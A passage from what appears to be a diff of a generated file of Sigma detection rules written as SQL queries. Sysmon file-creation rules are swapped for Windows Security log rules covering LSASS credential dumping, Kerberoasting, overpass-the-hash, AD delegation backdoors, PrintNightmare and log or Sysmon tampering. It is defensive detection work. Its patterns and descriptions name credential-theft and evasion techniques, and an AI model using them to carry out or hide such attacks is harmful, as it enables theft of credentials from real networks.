ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\taskhostw.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\aurora\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE '%\\\\x64\\\\SCENARIOENGINE.EXE' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND ProcessName LIKE '%\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\')))" ], - "filename": "file_event_win_malware_pingback_backdoor.yml" + "filename": "win_security_susp_lsass_dump_generic.yml" }, { - "title": "UAC Bypass Abusing Winsat Path Parsing - File", - "id": "155dbf56-e0a4-4dd0-8905-8a98705045e8", + "title": "Weak Encryption Enabled and Kerberoast", + "id": "f6de9536-0441-4b3f-a646-f4e00f300ffd", "status": "test", - "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.", + "author": "@neu5ron", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winmm.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4738' AND ((((NewUacValue LIKE '%8___' ESCAPE '\\' OR NewUacValue LIKE '%9___' ESCAPE '\\' OR NewUacValue LIKE '%A___' ESCAPE '\\' OR NewUacValue LIKE '%B___' ESCAPE '\\' OR NewUacValue LIKE '%C___' ESCAPE '\\' OR NewUacValue LIKE '%D___' ESCAPE '\\' OR NewUacValue LIKE '%E___' ESCAPE '\\' OR NewUacValue LIKE '%F___' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8___' ESCAPE '\\' OR OldUacValue LIKE '%9___' ESCAPE '\\' OR OldUacValue LIKE '%A___' ESCAPE '\\' OR OldUacValue LIKE '%B___' ESCAPE '\\' OR OldUacValue LIKE '%C___' ESCAPE '\\' OR OldUacValue LIKE '%D___' ESCAPE '\\' OR OldUacValue LIKE '%E___' ESCAPE '\\' OR OldUacValue LIKE '%F___' ESCAPE '\\'))) OR ((NewUacValue LIKE '%1____' ESCAPE '\\' OR NewUacValue LIKE '%3____' ESCAPE '\\' OR NewUacValue LIKE '%5____' ESCAPE '\\' OR NewUacValue LIKE '%7____' ESCAPE '\\' OR NewUacValue LIKE '%9____' ESCAPE '\\' OR NewUacValue LIKE '%B____' ESCAPE '\\' OR NewUacValue LIKE '%D____' ESCAPE '\\' OR NewUacValue LIKE '%F____' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%1____' ESCAPE '\\' OR OldUacValue LIKE '%3____' ESCAPE '\\' OR OldUacValue LIKE '%5____' ESCAPE '\\' OR OldUacValue LIKE '%7____' ESCAPE '\\' OR OldUacValue LIKE '%9____' ESCAPE '\\' OR OldUacValue LIKE '%B____' ESCAPE '\\' OR OldUacValue LIKE '%D____' ESCAPE '\\' OR OldUacValue LIKE '%F____' ESCAPE '\\')))) OR ((NewUacValue LIKE '%8__' ESCAPE '\\' OR NewUacValue LIKE '%9__' ESCAPE '\\' OR NewUacValue LIKE '%A__' ESCAPE '\\' OR NewUacValue LIKE '%B__' ESCAPE '\\' OR NewUacValue LIKE '%C__' ESCAPE '\\' OR NewUacValue LIKE '%D__' ESCAPE '\\' OR NewUacValue LIKE '%E__' ESCAPE '\\' OR NewUacValue LIKE '%F__' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8__' ESCAPE '\\' OR OldUacValue LIKE '%9__' ESCAPE '\\' OR OldUacValue LIKE '%A__' ESCAPE '\\' OR OldUacValue LIKE '%B__' ESCAPE '\\' OR OldUacValue LIKE '%C__' ESCAPE '\\' OR OldUacValue LIKE '%D__' ESCAPE '\\' OR OldUacValue LIKE '%E__' ESCAPE '\\' OR OldUacValue LIKE '%F__' ESCAPE '\\')))))" ], - "filename": "file_event_win_uac_bypass_winsat.yml" + "filename": "win_security_alert_enable_weak_encryption.yml" }, { - "title": "Suspicious Word Cab File Write CVE-2021-40444", - "id": "60c0a111-787a-4e8a-9262-ee485f3ef9d5", - "status": "experimental", - "description": "Detects file creation patterns noticeable during the exploitation of CVE-2021-40444", - "author": "Florian Roth (Nextron Systems), Sittikorn S", + "title": "Enabled User Right in AD to Control User Objects", + "id": "311b6ce2-7890-4383-a8c2-663a9f6b43cd", + "status": "test", + "description": "Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.", + "author": "@neu5ron", "tags": [ - "attack.resource_development", - "attack.t1587" + "attack.persistence", + "attack.t1098" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\INetCache%' ESCAPE '\\') OR (Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.inf%' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%AppData\\\\Local\\\\Temp%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Content.inf' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4704' AND PrivilegeList LIKE '%SeEnableDelegationPrivilege%' ESCAPE '\\')" ], - "filename": "file_event_win_winword_cve_2021_40444.yml" + "filename": "win_security_alert_active_directory_user_control.yml" }, { - "title": "CVE-2021-1675 Print Spooler Exploitation Filename Pattern", - "id": "2131cfb3-8c12-45e8-8fa0-31f5924e9f07", + "title": "Password Dumper Activity on LSASS", + "id": "aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c", "status": "test", - "description": "Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN", + "author": "sigma", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.resource_development", - "attack.t1587", - "cve.2021.1675" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\old\\\\1\\\\123%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND AccessMask = '0x705' AND ObjectType LIKE 'SAM\\_DOMAIN' ESCAPE '\\')" ], - "filename": "file_event_win_cve_2021_1675_printspooler.yml" + "filename": "win_security_susp_lsass_dump.yml" }, { - "title": "Windows Shell File Write to Suspicious Folder", - "id": "1277f594-a7d1-4f28-a2d3-73af5cbeab43", - "status": "experimental", - "description": "Detects a Windows executable that writes files to suspicious folders", - "author": "Florian Roth (Nextron Systems)", + "title": "ETW Logging Disabled In .NET Processes - Registry", + "id": "a4c90ea1-2634-4ca0-adbb-35eae169b6fc", + "status": "test", + "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "tags": [ + "attack.defense_evasion", + "attack.t1112", + "attack.t1562" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\Users\\\\Public%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\PerfLogs%' ESCAPE '\\')) OR ((Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\') AND (TargetFilename LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\PerfLogs%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework' ESCAPE '\\' AND ObjectValueName = 'ETWEnabled' AND NewValue = '0') OR (EventID = '4657' AND ObjectName LIKE '%\\\\Environment%' ESCAPE '\\' AND (ObjectValueName LIKE 'COMPlus\\_ETWEnabled' ESCAPE '\\' OR ObjectValueName LIKE 'COMPlus\\_ETWFlags' ESCAPE '\\') AND NewValue = '0')))" ], - "filename": "file_event_win_shell_write_susp_directory.yml" + "filename": "win_security_dot_net_etw_tamper.yml" }, { - "title": "Powerup Write Hijack DLL", - "id": "602a1f13-c640-4d73-b053-be9a2fa58b96", + "title": "Security Event Log Cleared", + "id": "a122ac13-daf8-4175-83a2-72c387be339d", "status": "test", - "description": "Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.\nIn it's default mode, it builds a self deleting .bat file which executes malicious command.\nThe detection rule relies on creation of the malicious bat file (debug.bat by default).\n", - "author": "Subhash Popuri (@pbssubhash)", + "description": "Checks for event id 1102 which indicates the security event log was cleared.", + "author": "Saw Winn Naung", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1574.001" + "attack.t1070.001" ], "falsepositives": [ - "Any powershell script that creates bat files" + "Legitimate administrative activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%.bat' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '1102' AND Provider_Name = 'Microsoft-Windows-Eventlog')" ], - "filename": "file_event_win_hktl_powerup_dllhijacking.yml" + "filename": "win_security_event_log_cleared.yml" }, { - "title": "Created Files by Office Applications", - "id": "c7a74c80-ba5a-486e-9974-ab9e682bc5e4", - "status": "experimental", - "description": "This rule will monitor executable and script file creation by office applications. Please add more file extensions or magic bytes to the logic of your choice.", - "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", + "title": "SMB Create Remote File Admin Share", + "id": "b210394c-ba12-4f89-9117-44a2464b9511", + "status": "test", + "description": "Look for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$).", + "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", "tags": [ - "attack.t1204.002", - "attack.execution" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\' OR TargetFilename LIKE '%.com' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.proj' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\WebServiceCache\\\\AllUsers%' ESCAPE '\\' AND TargetFilename LIKE '%.com' ESCAPE '\\') OR (Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\webexdelta\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\assembly\\\\tmp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '%C$' ESCAPE '\\' AND AccessMask = '0x2') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_script_creation_by_office_using_file_ext.yml" + "filename": "win_security_smb_file_creation_admin_shares.yml" }, { - "title": "Suspicious File Creation In Uncommon AppData Folder", - "id": "d7b50671-d1ad-4871-aa60-5aa5b331fe04", - "status": "experimental", - "description": "Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Active Directory User Backdoors", + "id": "300bac00-e041-4ee2-9c36-e262656a6ecc", + "status": "test", + "description": "Detects scenarios where one can control another users or computers account without having to use their credentials.", + "author": "@neu5ron", "tags": [ - "attack.defense_evasion", - "attack.execution" + "attack.t1098", + "attack.persistence" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.psm1' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\LocalLow\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4738' AND NOT (AllowedToDelegateTo = '-' OR AllowedToDelegateTo = '')) OR ((EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToDelegateTo') OR (EventID = '5136' AND ObjectClass = 'user' AND AttributeLDAPDisplayName = 'servicePrincipalName') OR (EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToActOnBehalfOfOtherIdentity'))))" ], - "filename": "file_event_win_new_files_in_uncommon_appdata_folder.yml" + "filename": "win_security_alert_ad_user_backdoors.yml" }, { - "title": "Potential Remote Credential Dumping Activity", - "id": "6e2a900a-ced9-4e4a-a9c2-13e706f9518a", - "status": "experimental", - "description": "Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.", - "author": "SecurityAura", + "title": "User Added to Local Administrators", + "id": "c265cf08-3f99-46c1-8d59-328247057d57", + "status": "stable", + "description": "This rule triggers on user accounts that are added to the local Administrators group, which could be legitimate activity or a sign of privilege escalation activity", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.privilege_escalation", + "attack.t1078", + "attack.persistence", + "attack.t1098" ], "falsepositives": [ - "Unknown" + "Legitimate administrative activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename REGEXP '\\\\Windows\\\\System32\\\\[a-zA-Z0-9]{8}\\.tmp$')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4732' AND (TargetUserName LIKE 'Administr%' ESCAPE '\\' OR TargetSid = 'S-1-5-32-544')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_remote_cred_dump.yml" + "filename": "win_security_user_added_to_local_administrators.yml" }, { - "title": "PsExec Service File Creation", - "id": "259e5a6a-b8d2-4c38-86e2-26c5e651361d", + "title": "T1047 Wmiprvse Wbemcomn DLL Hijack", + "id": "f6c68d5f-e101-4b86-8c84-7d96851fd65c", "status": "test", - "description": "Detects default PsExec service filename which indicates PsExec service installation and execution", - "author": "Thomas Patzke", + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network for a WMI DLL Hijack scenario.", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", "tags": [ "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\PSEXESVC.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_tool_psexec.yml" + "filename": "win_security_wmiprvse_wbemcomn_dll_hijack.yml" }, { - "title": "Suspicious DotNET CLR Usage Log Artifact", - "id": "e0b06658-7d1d-4cd3-bf15-03467507ff7c", + "title": "PetitPotam Suspicious Kerberos TGT Request", + "id": "6a53d871-682d-40b6-83e0-b7c1a6c4e3a5", "status": "experimental", - "description": "Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context.", - "author": "frack113, omkar72, oscd.community, Wojciech Lesicki", + "description": "Detect suspicious Kerberos TGT requests.\nOnce an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes.\nOne way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus.\nThis request will generate a 4768 event with some unusual fields depending on the environment.\nThis analytic will require tuning, we recommend filtering Account_Name to the Domain Controller computer accounts.\n", + "author": "Mauricio Velazco, Michael Haag", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.credential_access", + "attack.t1187" ], "falsepositives": [ - "Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675" + "False positives are possible if the environment is using certificates for authentication. We recommend filtering Account_Name to the Domain Controller computer accounts." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\UsageLogs\\\\cmstp.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\cscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\mshta.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\msxsl.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\regsvr32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\rundll32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\svchost.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wmic.exe.log' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\MsiExec.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% -Embedding%' ESCAPE '\\' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%Temp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4768' AND TargetUserName LIKE '%$' ESCAPE '\\' AND CertThumbprint LIKE '%' ESCAPE '\\') AND NOT ((IpAddress = '::1') OR (CertThumbprint = '')))" ], - "filename": "file_event_win_net_cli_artefact.yml" + "filename": "win_security_petitpotam_susp_tgt_request.yml" }, { - "title": "Potential DCOM InternetExplorer.Application DLL Hijack", - "id": "2f7979ae-f82b-45af-ac1d-2b10e93b0baa", + "title": "Successful Overpass the Hash Attempt", + "id": "192a0330-c20b-4356-90b6-7b7049ae0b87", "status": "test", - "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class over the network", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", + "description": "Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.", + "author": "Roberto Rodriguez (source), Dominik Schaudel (rule)", "tags": [ "attack.lateral_movement", - "attack.t1021.002", - "attack.t1021.003" + "attack.s0002", + "attack.t1550.002" + ], + "falsepositives": [ + "Runas command-line tool using /netonly parameter" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'seclogo' AND AuthenticationPackageName = 'Negotiate')" + ], + "filename": "win_security_overpass_the_hash.yml" + }, + { + "title": "SCM Database Privileged Operation", + "id": "dae8171c-5ec6-4396-b210-8466585b53e9", + "status": "test", + "description": "Detects non-system users performing privileged operation os the SCM database", + "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", + "tags": [ + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image = 'System' AND TargetFilename LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4674' AND ObjectType LIKE 'SC\\_MANAGER OBJECT' ESCAPE '\\' AND ObjectName = 'servicesactive' AND PrivilegeList = 'SeTakeOwnershipPrivilege') AND NOT (SubjectLogonId = '0x3e4' AND ProcessName LIKE '%:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\'))" ], - "filename": "file_event_win_dcom_iertutil_dll_hijack.yml" + "filename": "win_security_scm_database_privileged_operation.yml" }, { - "title": "Suspicious Desktopimgdownldr Target File", - "id": "fc4f4817-0c53-4683-a4ee-b17a64bc1039", + "title": "Kerberos Manipulation", + "id": "f7644214-0eb0-4ace-9455-331ec4c09253", "status": "test", - "description": "Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension", + "description": "This method triggers on rare Kerberos Failure Codes caused by manipulations of Kerberos messages", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1105" + "attack.credential_access", + "attack.t1212" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Faulty legacy applications" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Personalization\\\\LockScreenImage\\\\%' ESCAPE '\\') AND NOT (TargetFilename LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%.jpg%' ESCAPE '\\' OR TargetFilename LIKE '%.jpeg%' ESCAPE '\\' OR TargetFilename LIKE '%.png%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('675', '4768', '4769', '4771') AND FailureCode IN ('0x9', '0xA', '0xB', '0xF', '0x10', '0x11', '0x13', '0x14', '0x1A', '0x1F', '0x21', '0x22', '0x23', '0x24', '0x26', '0x27', '0x28', '0x29', '0x2C', '0x2D', '0x2E', '0x2F', '0x31', '0x32', '0x3E', '0x3F', '0x40', '0x41', '0x43', '0x44'))" ], - "filename": "file_event_win_susp_desktopimgdownldr_file.yml" + "filename": "win_security_susp_kerberos_manipulation.yml" }, { - "title": "PowerShell Profile Modification", - "id": "b5b78988-486d-4a80-b991-930eff3ff8bf", + "title": "Sysmon Channel Reference Deletion", + "id": "18beca67-ab3e-4ee3-ba7a-a46ca8d7d0cc", "status": "test", - "description": "Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", - "author": "HieuTT35, Nasreddine Bencherchali", + "description": "Potential threat actor tampering with Sysmon manifest and eventually disabling it", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.013" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "System administrator creating Powershell profile manually" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\Microsoft.PowerShell\\_profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WindowsPowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Program Files\\\\PowerShell\\\\7\\\\profile.ps1' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND ObjectValueName = 'Enabled' AND NewValue = '0') OR (EventID = '4663' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND AccessMask = '65536')))" ], - "filename": "file_event_win_susp_powershell_profile.yml" + "filename": 